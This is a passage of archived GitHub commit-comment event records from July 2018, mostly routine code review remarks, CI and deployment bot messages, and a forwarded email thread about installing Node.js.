not matter in this case.\r\n\r\n9.\tWhat's fc-weight for? Looks sketchy....\r\n\r\n—\r\nYou are receiving this because you were mentioned.\r\nReply to this email directly, view it on GitHub < Caution-https://github.com/fsdonks/demand_builder/commit/e2446b99646f986e8c77c47d0bd741be6e500606#commitcomment-29739814 > , or mute the thread < Caution-https://github.com/notifications/unsubscribe-auth/AcICZwohDJnGIInofSeqP9ateJnt3mEQks5uHjsegaJpZM4VTbTC > . <Caution-https://github.com/notifications/beacon/AcICZ5oqHEUk026aZ6J9_dW-SMAqpJQ3ks5uHjsegaJpZM4VTbTC.gif> \r\n\r\nCLASSIFICATION: UNCLASSIFIED\r\n"}},"created_at":"2018-07-17T21:58:43Z"}
{"id":"7979487769","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29741376,"position":null,"line":null,"path":null,"commit_id":"3b249ef14b53d996a36b5295f156c282cc12c195","created_at":"2018-07-17T21:58:46Z","updated_at":"2018-07-17T21:58:46Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-405](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-405).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-405-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T21:58:46Z"}
{"id":"7979490508","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29741381,"position":null,"line":null,"path":null,"commit_id":"1c526db38488c31e83cba87222b386b035058397","created_at":"2018-07-17T21:59:28Z","updated_at":"2018-07-17T21:59:28Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-50](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-50).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-50-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T21:59:28Z"}
{"id":"7979494096","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29741396,"position":null,"line":null,"path":null,"commit_id":"a07e09c120412549a00690af7f8858b83e6ea1e1","created_at":"2018-07-17T22:00:18Z","updated_at":"2018-07-17T22:00:18Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the note viewable](https://trello.com/c/0ehKS0sQ/7-make-the-note-viewable)"}},"created_at":"2018-07-17T22:00:18Z"}
{"id":"7979494117","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29741397,"position":null,"line":null,"path":null,"commit_id":"a07e09c120412549a00690af7f8858b83e6ea1e1","created_at":"2018-07-17T22:00:19Z","updated_at":"2018-07-17T22:00:19Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the note viewable](https://trello.com/c/0ehKS0sQ/7-make-the-note-viewable)"}},"created_at":"2018-07-17T22:00:19Z"}
{"id":"7979494349","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29741398,"position":null,"line":null,"path":null,"commit_id":"7dfc785dd5b2dcbe0d353dc1d785a7e42ffc7ea5","created_at":"2018-07-17T22:00:21Z","updated_at":"2018-07-17T22:00:21Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Make the note viewable](https://trello.com/c/0ehKS0sQ/7-make-the-note-viewable)"}},"created_at":"2018-07-17T22:00:21Z"}
{"id":"7979495603","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29741401,"position":null,"line":null,"path":null,"commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T22:00:38Z","updated_at":"2018-07-17T22:00:38Z","author_association":"CONTRIBUTOR","body":"Ah, I see. I missed one of the lines containing `array_ptr->dimensions`. All of those were supposed to be replaced with `npy_intp * dims_ptr = (npy_intp*)PyArray_DIMS(array_ptr);`. This is resolved in my latest commit."}},"created_at":"2018-07-17T22:00:38Z"}
{"id":"7979496971","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29741402,"position":285,"line":246,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-17T22:00:57Z","updated_at":"2018-07-17T22:00:57Z","author_association":"NONE","body":"Which situations does this `else` allow for a game to be cancelled?"}},"created_at":"2018-07-17T22:00:57Z"}
{"id":"7979500688","type":"CommitCommentEvent","actor":{"login":"glassresistor"},"repo":{"name":"codeforamerica/clientcomm-rails"},"payload":{"comment":{"id":29741409,"position":5,"line":20,"path":"app/assets/javascripts/channels/messages.js","commit_id":"899e539a8bf0de47ce1146c38317c35ecb5f9275","created_at":"2018-07-17T22:01:47Z","updated_at":"2018-07-17T22:01:47Z","author_association":"COLLABORATOR","body":"great"}},"created_at":"2018-07-17T22:01:47Z"}
{"id":"7979501021","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741410,"position":36,"line":36,"path":"pifagor.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T22:01:52Z","updated_at":"2018-07-17T22:01:52Z","author_association":"NONE","body":"а) пробелы в формулах вроде max**2==min1**2+min2**2\r\nб) если треугольник равнобедренный, но не прямоугольный, то ничего не будет выведено\r\nв) max**2==min1**2+min2**2 - проверяется два раза\r\n\r\n\r\nЯ бы значение проверок записал в переменные, и в зависимости от сочетаний переменных - выводил уже результат.\r\n\r\nP.S.  идея отсортировать отличная"}},"created_at":"2018-07-17T22:01:52Z"}
{"id":"7979501514","type":"CommitCommentEvent","actor":{"login":"axboe"},"repo":{"name":"axboe/fio"},"payload":{"comment":{"id":29741411,"position":null,"line":null,"path":null,"commit_id":"bd71edcedc3dcbce4fe32357523434d8f249b02d","created_at":"2018-07-17T22:01:58Z","updated_at":"2018-07-17T22:01:58Z","author_association":"OWNER","body":"I'm sort of surprised that it hasn't bugged folks more, but at least now it's fixed."}},"created_at":"2018-07-17T22:01:58Z"}
{"id":"7979503557","type":"CommitCommentEvent","actor":{"login":"mehdisagar"},"repo":{"name":"mehdisagar/Code_C"},"payload":{"comment":{"id":29741415,"position":null,"line":null,"path":null,"commit_id":"697cfb74263c102cd9ddf397334e5be80b521d72","created_at":"2018-07-17T22:02:27Z","updated_at":"2018-07-17T22:02:27Z","author_association":"OWNER","body":"reading and writing from and to a file in C++ using <fstream>"}},"created_at":"2018-07-17T22:02:27Z"}
{"id":"7979503902","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741416,"position":4,"line":4,"path":"triangle.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T22:02:33Z","updated_at":"2018-07-17T22:02:33Z","author_association":"NONE","body":"to_f надо делать при получении значения \r\nto_i нельзя, так как стороны могут быть не целыми"}},"created_at":"2018-07-17T22:02:33Z"}
{"id":"7979504480","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741418,"position":9,"line":9,"path":"weight.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T22:02:43Z","updated_at":"2018-07-17T22:02:43Z","author_association":"NONE","body":"неверный отступ"}},"created_at":"2018-07-17T22:02:43Z"}
{"id":"7979505277","type":"CommitCommentEvent","actor":{"login":"startaper"},"repo":{"name":"NikitaSharipov/lesson1"},"payload":{"comment":{"id":29741426,"position":9,"line":9,"path":"weight.rb","commit_id":"a84da1dcd83a820e44d5dcfa0c4b3c1391f75644","created_at":"2018-07-17T22:02:54Z","updated_at":"2018-07-17T22:02:54Z","author_association":"NONE","body":"аналогично to_i при получении данных"}},"created_at":"2018-07-17T22:02:54Z"}
{"id":"7979505653","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29741427,"position":84,"line":66,"path":"contracts/Remittance.sol","commit_id":"e572e9501219ab51a52d241092544c6610b6c9ae","created_at":"2018-07-17T22:03:01Z","updated_at":"2018-07-17T22:03:01Z","author_association":"OWNER","body":"thank you. I think I understand now. Quick question though, in the following snippet ...: \r\n```\r\nPayment storage payment = payments[paymentID];\r\nrequire (msg.sender == payment.exchange , \"Only the Exchange can execute process Payment function\");\r\n```\r\nDoes the require sentence execute an SLOAD?"}},"created_at":"2018-07-17T22:03:01Z"}
{"id":"7979509339","type":"CommitCommentEvent","actor":{"login":"AshMenhennett"},"repo":{"name":"AshMenhennett/Forum"},"payload":{"comment":{"id":29741438,"position":null,"line":null,"path":null,"commit_id":"32f8b1604be420e484488fd7ad0890a2a3837624","created_at":"2018-07-17T22:03:55Z","updated_at":"2018-07-17T22:03:55Z","author_association":"OWNER","body":"Ok, the rest of the app uses type hinting 😃"}},"created_at":"2018-07-17T22:03:55Z"}
{"id":"7979510273","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29741442,"position":null,"line":null,"path":null,"commit_id":"3de5361b07cdde95df0218fc1e349622d0487d3e","created_at":"2018-07-17T22:04:08Z","updated_at":"2018-07-17T22:04:08Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-145](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-145).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-145-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-17T22:04:08Z"}
{"id":"7979511364","type":"CommitCommentEvent","actor":{"login":"Rickrod82"},"repo":{"name":"creativecommons/bootstrap-mediawiki"},"payload":{"comment":{"id":29741445,"position":null,"line":null,"path":null,"commit_id":"0ff54e8029ac7d9cf6925cc54a882a9406a0c998","created_at":"2018-07-17T22:04:24Z","updated_at":"2018-07-17T22:04:24Z","author_association":"NONE","body":"Retrieve balance"}},"created_at":"2018-07-17T22:04:24Z"}
{"id":"7979512729","type":"CommitCommentEvent","actor":{"login":"joelagnel"},"repo":{"name":"joelagnel/linux"},"payload":{"comment":{"id":29741449,"position":null,"line":null,"path":null,"commit_id":"caea81c39a56881a37df22263f956c295729c803","created_at":"2018-07-17T22:04:45Z","updated_at":"2018-07-17T22:04:45Z","author_association":"OWNER","body":"this is needed"}},"created_at":"2018-07-17T22:04:45Z"}
{"id":"7979515613","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29741455,"position":null,"line":null,"path":null,"commit_id":"eb5c73b603558cbf87b488678886c288a1587952","created_at":"2018-07-17T22:05:29Z","updated_at":"2018-07-17T22:05:29Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Delete an existing note](https://trello.com/c/l6U5gVYX/4-delete-an-existing-note)"}},"created_at":"2018-07-17T22:05:29Z"}
{"id":"7979517235","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29741458,"position":36,"line":146,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"f007cd6361371e6ce3a9d3b51c341638415855ce","created_at":"2018-07-17T22:05:55Z","updated_at":"2018-07-17T22:05:55Z","author_association":"NONE","body":"Just a minor note, the contents inside the heredoc are indented by the beginning of the closing `\"\"\"`. This means all of the contents of the heredoc above are indented with two extra spaces. :)"}},"created_at":"2018-07-17T22:05:55Z"}
{"id":"7979518142","type":"CommitCommentEvent","actor":{"login":"Taikos"},"repo":{"name":"Taikos/RT-Team"},"payload":{"comment":{"id":29741463,"position":null,"line":null,"path":null,"commit_id":"fd61d923b95fb496637255e6276486247ee04e05","created_at":"2018-07-17T22:06:09Z","updated_at":"2018-07-17T22:06:09Z","author_association":"OWNER","body":"Top ça va nous aider !"}},"created_at":"2018-07-17T22:06:09Z"}
{"id":"7979518704","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":29741464,"position":null,"line":null,"path":null,"commit_id":"1793f2cbed711c3de6154262a620374141c9ec44","created_at":"2018-07-17T22:06:16Z","updated_at":"2018-07-17T22:06:16Z","author_association":"COLLABORATOR","body":"I can confirm this fix is correct"}},"created_at":"2018-07-17T22:06:16Z"}
{"id":"7979520027","type":"CommitCommentEvent","actor":{"login":"corazzon"},"repo":{"name":"BLUENCE/TWL"},"payload":{"comment":{"id":29741468,"position":null,"line":null,"path":null,"commit_id":"9061af791f4f5af04df154f71bf0eb4e6adc086d","created_at":"2018-07-17T22:06:36Z","updated_at":"2018-07-17T22:06:36Z","author_association":"NONE","body":"@BLUENCE 매일 빠지지 않고 일일커밋을 하고 계셨네요! 너무 훌륭해요! 👍 💯 \r\n데잇걸즈 TWL로 풀리퀘를 보내주시면 다른 분들이 정리해 주신 내용을 보고 공부하기 더 좋을것 같아요!  :)"}},"created_at":"2018-07-17T22:06:36Z"}
{"id":"7979527927","type":"CommitCommentEvent","actor":{"login":"NEDCampDev"},"repo":{"name":"NEDCamp/nedcamp"},"payload":{"comment":{"id":29741480,"position":null,"line":null,"path":null,"commit_id":"943ffb1e9f63035cc979d27a1fd8d977832a93ee","created_at":"2018-07-17T22:08:33Z","updated_at":"2018-07-17T22:08:33Z","author_association":"COLLABORATOR","body":"Created multidev environment [nedcamp#ci-148](https://dashboard.pantheon.io/sites/1e9ab33c-01d3-42bd-bb42-5008333172a3#ci-148).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-148-nedcamp.pantheonsite.io/)"}},"created_at":"2018-07-17T22:08:33Z"}
{"id":"7979527965","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29741481,"position":null,"line":null,"path":null,"commit_id":"51a388694b597dc9af0a6fdaa9949f117f149bb1","created_at":"2018-07-17T22:08:33Z","updated_at":"2018-07-17T22:08:33Z","author_association":"NONE","body":"159013173_Issue#6243 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2943 of 2943 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-51a388694b597dc9af0a6fdaa9949f117f149bb1-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-17T22:08:33Z"}
{"id":"7979528327","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29741484,"position":null,"line":null,"path":null,"commit_id":"e6a836b4fdab36200bbca082c36e3c4d5fcb1dbc","created_at":"2018-07-17T22:08:38Z","updated_at":"2018-07-17T22:08:38Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/e6a836b4fdab36200bbca082c36e3c4d5fcb1dbc/index.html"}},"created_at":"2018-07-17T22:08:38Z"}
{"id":"7979529657","type":"CommitCommentEvent","actor":{"login":"smed79"},"repo":{"name":"easylist/easylist"},"payload":{"comment":{"id":29741487,"position":5,"line":281,"path":"fanboy-addon/fanboy_cookie_general_block.txt","commit_id":"1070e49627487bcf768d391b1e1f4c84bb6d19ea","created_at":"2018-07-17T22:08:57Z","updated_at":"2018-07-17T22:08:57Z","author_association":"CONTRIBUTOR","body":"@Khrin redundancy here."}},"created_at":"2018-07-17T22:08:57Z"}
{"id":"7979531700","type":"CommitCommentEvent","actor":{"login":"Rohanator9000"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29741494,"position":273,"line":232,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T22:09:30Z","updated_at":"2018-07-17T22:09:30Z","author_association":"NONE","body":"Excluding any caching of list_users() (that you recommended above), this is more efficient because it returns as soon as a sufficient number of users is found, so it doesn't make any extra unnecessary calls."}},"created_at":"2018-07-17T22:09:30Z"}
{"id":"7979532930","type":"CommitCommentEvent","actor":{"login":"marc-hanheide"},"repo":{"name":"LCAS/depth_sensors"},"payload":{"comment":{"id":29741499,"position":null,"line":null,"path":null,"commit_id":"a1b79a3b07584c8891c1bde38e4cea398ba1f618","created_at":"2018-07-17T22:09:51Z","updated_at":"2018-07-17T22:09:51Z","author_association":"MEMBER","body":"@MFernandezCarmona before I put this on the build farm, please correct the maintainers in all `package.xml`"}},"created_at":"2018-07-17T22:09:51Z"}
{"id":"7979534141","type":"CommitCommentEvent","actor":{"login":"benjamn"},"repo":{"name":"meteor/meteor"},"payload":{"comment":{"id":29741507,"position":3,"line":3,"path":"packages/inter-process-messaging/inter-process-messaging.js","commit_id":"7d25b592b61f9ad9f9f6398ffcc65da300a239ee","created_at":"2018-07-17T22:10:11Z","updated_at":"2018-07-17T22:10:11Z","author_association":"MEMBER","body":"> _Not to be confused with the criminal act of deliberately setting fire to property!_\r\n\r\n[As noted in the README](https://www.npmjs.com/package/arson#ar-bitrary-s-tructured-o-bject-n-otation) 😉 "}},"created_at":"2018-07-17T22:10:11Z"}
{"id":"7979534380","type":"CommitCommentEvent","actor":{"login":"PrettyKitty92"},"repo":{"name":"PrettyKitty92/percentiles-ui"},"payload":{"comment":{"id":29741508,"position":null,"line":null,"path":null,"commit_id":"396e37155ee9aa5ef9a73d8e26261f7134ef5a34","created_at":"2018-07-17T22:10:14Z","updated_at":"2018-07-17T22:10:14Z","author_association":"OWNER","body":"pathrewrite 1"}},"created_at":"2018-07-17T22:10:14Z"}
{"id":"7979536830","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29741512,"position":null,"line":null,"path":null,"commit_id":"3820596e4b22bd9e32139584fdb0e415540eb90a","created_at":"2018-07-17T22:10:50Z","updated_at":"2018-07-17T22:10:50Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#pr-51](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#pr-51).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-51-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T22:10:50Z"}
{"id":"7979536855","type":"CommitCommentEvent","actor":{"login":"mollyfish"},"repo":{"name":"spinaltaper/data-structures-and-algorithms-java"},"payload":{"comment":{"id":29741513,"position":8,"line":8,"path":"src/day04_array_adjacent_product/ArrayAdjacentProduct.java","commit_id":"8329d4a042207508f6c005c699ac7fce74d7308b","created_at":"2018-07-17T22:10:50Z","updated_at":"2018-07-17T22:10:50Z","author_association":"NONE","body":"Instead of creating artificial data, go ahead and sample real data from your arrays - this will avoid the pitfall of some crazy value in your array starting out larger than your max or less than your min."}},"created_at":"2018-07-17T22:10:50Z"}
{"id":"7979537321","type":"CommitCommentEvent","actor":{"login":"americkson"},"repo":{"name":"RAIL-UGA/rail-uga-stellar"},"payload":{"comment":{"id":29741517,"position":null,"line":null,"path":null,"commit_id":"fd026e5a35d64915feee84dbe857f173e859bef5","created_at":"2018-07-17T22:10:58Z","updated_at":"2018-07-17T22:10:58Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [rail-uga-stellar#ci-407](https://dashboard.pantheon.io/sites/05f5afa3-c1ec-448f-915a-9234103f2409#ci-407).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-407-rail-uga-stellar.pantheonsite.io/)"}},"created_at":"2018-07-17T22:10:58Z"}
{"id":"7979539466","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29741522,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-17T22:11:32Z","updated_at":"2018-07-17T22:11:32Z","author_association":"NONE","body":"i'm uplooadind node.js. but it's interessant, but i'm not yet capacity to\ndo it... i'm soory. but with time i'll prove. thx you for help\n\n2018-07-16 22:58 GMT+00:00 badiane baba <baboulahi90@gmail.com>:\n\n> Ok man ! Je vais essayer. I’ll try\n>\n>\n>\n> Baba Badiane\n>\n>\n>\n> *De : *Zeke Sikelianos <notifications@github.com>\n> *Envoyé le :*Altine 16 Sullet 2018 22:17\n> *À : *nice-registry/owners <owners@noreply.github.com>\n> *Cc : *1990b <baboulahi90@gmail.com>; Mention <mention@noreply.github.com>\n> *Objet :*Re: [nice-registry/owners] it's a start (91c5a82)\n>\n>\n>\n> premier pas: telecharger et installer node.js a https://nodejs.org\n>\n> —\n> You are receiving this because you were mentioned.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/nice-registry/owners/commit/91c5a82fbc0622873eaf243e780c56125b737669#commitcomment-29727269>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AnXMUQfwaNId4ac9UWFlb2Bn1HSOAfLfks5uHREJgaJpZM4VRpgp>\n> .[image:\n> https://github.com/notifications/beacon/AnXMUfYD7Prou60z6sZOhvdmAEOV9dXZks5uHREJgaJpZM4VRpgp.gif]\n>\n>\n>\n"}},"created_at":"2018-07-17T22:11:32Z"}
{"id":"7979539711","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29741524,"position":null,"line":null,"path":null,"commit_id":"8c54f7c7ec21bcc3b15012617cb7faedda3b1a30","created_at":"2018-07-17T22:11:36Z","updated_at":"2018-07-17T22:11:36Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/8c54f7c7ec21bcc3b15012617cb7faedda3b1a30/index.html"}},"created_at":"2018-07-17T22:11:36Z"}
{"id":"7979540016","type":"CommitCommentEvent","actor":{"login":"mollyfish"},"repo":{"name":"spinaltaper/data-structures-and-algorithms-java"},"payload":{"comment":{"id":29741525,"position":2,"line":2,"path":"src/day04_array_adjacent_product/ArrayAdjacentProductTest.java","commit_id":"8329d4a042207508f6c005c699ac7fce74d7308b","created_at":"2018-07-17T22:11:41Z","updated_at":"2018-07-17T22:11:41Z","author_association":"NONE","body":"You don't need all this whitespace between your `import` statements"}},"created_at":"2018-07-17T22:11:41Z"}
{"id":"7979540329","type":"CommitCommentEvent","actor":{"login":"colalillo"},"repo":{"name":"colalillo/hello-world"},"payload":{"comment":{"id":29741529,"position":null,"line":null,"path":null,"commit_id":"632a5dbc1054f6e2f29dcbc03caa53b4fccba572","created_at":"2018-07-17T22:11:47Z","updated_at":"2018-07-17T22:11:47Z","author_association":"OWNER","body":"Let it ride"}},"created_at":"2018-07-17T22:11:47Z"}
{"id":"7979540842","type":"CommitCommentEvent","actor":{"login":"kargakis"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29741531,"position":15,"line":530,"path":"prow/kube/client.go","commit_id":"93350bdb0782eec8ea8e8d2011d60d72c6cfb4f6","created_at":"2018-07-17T22:11:55Z","updated_at":"2018-07-17T22:11:55Z","author_association":"MEMBER","body":"oh no"}},"created_at":"2018-07-17T22:11:55Z"}
{"id":"7979541382","type":"CommitCommentEvent","actor":{"login":"PaperSlips"},"repo":{"name":"PaperSlips/GraphicsImplementation"},"payload":{"comment":{"id":29741534,"position":null,"line":null,"path":null,"commit_id":"651949d51b045e41eba471af80c5a1c457e1ac58","created_at":"2018-07-17T22:12:05Z","updated_at":"2018-07-17T22:12:05Z","author_association":"OWNER","body":"wow dlls are convoluted.\r\njust look at the tutorials for them..."}},"created_at":"2018-07-17T22:12:05Z"}
{"id":"7979543569","type":"CommitCommentEvent","actor":{"login":"lamosok70"},"repo":{"name":"piskelapp/piskel"},"payload":{"comment":{"id":29741538,"position":null,"line":null,"path":null,"commit_id":"c2fdb65e37ab503bfdc51145eb7490cac74bd56a","created_at":"2018-07-17T22:12:39Z","updated_at":"2018-07-17T22:12:39Z","author_association":"NONE","body":"-* screenshots / GIF (from another sof)"}},"created_at":"2018-07-17T22:12:39Z"}
{"id":"7979543767","type":"CommitCommentEvent","actor":{"login":"kargakis"},"repo":{"name":"kubernetes/test-infra"},"payload":{"comment":{"id":29741540,"position":15,"line":530,"path":"prow/kube/client.go","commit_id":"93350bdb0782eec8ea8e8d2011d60d72c6cfb4f6","created_at":"2018-07-17T22:12:42Z","updated_at":"2018-07-17T22:12:42Z","author_association":"MEMBER","body":"you should pass the container name as an argument in GetLog instead of hardcoding in the client - this is what broke the log tracer :)"}},"created_at":"2018-07-17T22:12:42Z"}
{"id":"7979544883","type":"CommitCommentEvent","actor":{"login":"1990b"},"repo":{"name":"nice-registry/owners"},"payload":{"comment":{"id":29741543,"position":null,"line":null,"path":null,"commit_id":"91c5a82fbc0622873eaf243e780c56125b737669","created_at":"2018-07-17T22:12:59Z","updated_at":"2018-07-17T22:12:59Z","author_association":"NONE","body":"https://nodejs.org/dist/v8.11.3/node-v8.11.3-linux-x64.tar.xz\nhttps://nodejs.org/dist/v10.6.0/node-v10.6.0-linux-x64.tar.xz.. i think\nit's this\n\n2018-07-17 22:11 GMT+00:00 badiane baba <baboulahi90@gmail.com>:\n\n> i'm uplooadind node.js. but it's interessant, but i'm not yet capacity to\n> do it... i'm soory. but with time i'll prove. thx you for help\n>\n> 2018-07-16 22:58 GMT+00:00 badiane baba <baboulahi90@gmail.com>:\n>\n>> Ok man ! Je vais essayer. I’ll try\n>>\n>>\n>>\n>> Baba Badiane\n>>\n>>\n>>\n>> *De : *Zeke Sikelianos <notifications@github.com>\n>> *Envoyé le :*Altine 16 Sullet 2018 22:17\n>> *À : *nice-registry/owners <owners@noreply.github.com>\n>> *Cc : *1990b <baboulahi90@gmail.com>; Mention\n>> <mention@noreply.github.com>\n>> *Objet :*Re: [nice-registry/owners] it's a start (91c5a82)\n>>\n>>\n>>\n>> premier pas: telecharger et installer node.js a https://nodejs.org\n>>\n>> —\n>> You are receiving this because you were mentioned.\n>> Reply to this email directly, view it on GitHub\n>> <https://github.com/nice-registry/owners/commit/91c5a82fbc0622873eaf243e780c56125b737669#commitcomment-29727269>,\n>> or mute the thread\n>> <https://github.com/notifications/unsubscribe-auth/AnXMUQfwaNId4ac9UWFlb2Bn1HSOAfLfks5uHREJgaJpZM4VRpgp>\n>> .[image:\n>> https://github.com/notifications/beacon/AnXMUfYD7Prou60z6sZOhvdmAEOV9dXZks5uHREJgaJpZM4VRpgp.gif]\n>>\n>>\n>>\n>\n>\n"}},"created_at":"2018-07-17T22:12:59Z"}
{"id":"7979546749","type":"CommitCommentEvent","actor":{"login":"cjdeane78"},"repo":{"name":"cjdeane78/GraphAdjMatrix"},"payload":{"comment":{"id":29741547,"position":14,"line":14,"path":"Module1.vb","commit_id":"7d191cc1e1bd761a39a2a84e74f14e7fbd9c262b","created_at":"2018-07-17T22:13:28Z","updated_at":"2018-07-17T22:13:28Z","author_association":"OWNER","body":"this is good"}},"created_at":"2018-07-17T22:13:28Z"}
{"id":"7979552418","type":"CommitCommentEvent","actor":{"login":"pauldotknopf"},"repo":{"name":"pauldotknopf/net-core-qml"},"payload":{"comment":{"id":29741563,"position":5,"line":40,"path":"src/native/QtNetCoreQml/QtNetCoreQml/qml/NetValueMetaObject.cpp","commit_id":"af730927532e17b676fcad7a97048f7e72a76ac8","created_at":"2018-07-17T22:14:58Z","updated_at":"2018-07-17T22:14:58Z","author_association":"OWNER","body":"Try ```QQmlEngine::CppOwnership``` explicitly, I'm not sure what the default is."}},"created_at":"2018-07-17T22:14:58Z"}
{"id":"7979554782","type":"CommitCommentEvent","actor":{"login":"josevalim"},"repo":{"name":"poanetwork/poa-explorer"},"payload":{"comment":{"id":29741570,"position":21,"line":2737,"path":"apps/explorer/lib/explorer/chain.ex","commit_id":"d9129b8d2ae6d98c18f665c31c7cf7c60b1779b4","created_at":"2018-07-17T22:15:30Z","updated_at":"2018-07-17T22:15:30Z","author_association":"NONE","body":"I think this could be written as an exists?\r\n\r\nI also wonder if we could break this into something more manageable and more intent revealing. For example:\r\n\r\n```elixir\r\ndefmacrop exists_token_transfer_with_matching_address_hash(transation_hash, bytes) do\r\n  quote do\r\n    fragment(\r\n      \"\"\"\r\n      EXISTS (\r\n        SELECT 1\r\n        FROM \"token_transfers\" AS tt\r\n        WHERE tt.\"transaction_hash\" = ? AND tt.\"to_address_hash\" = ?\r\n      )\r\n      \"\"\",\r\n      unquote(transaction_hash),\r\n      uquote(bytes)\r\n    )\r\n  end\r\nend\r\n```\r\n\r\nand then here you call:\r\n\r\n```elixir\r\nor exists_token_transfer_with_matching_address_hash(t.hash, ^addess_hash.bytes)\r\n```\r\n\r\nI think if the whole `where` was written on such composable chunks, the query will be more readable.\r\n\r\nPS: I didn't try the above 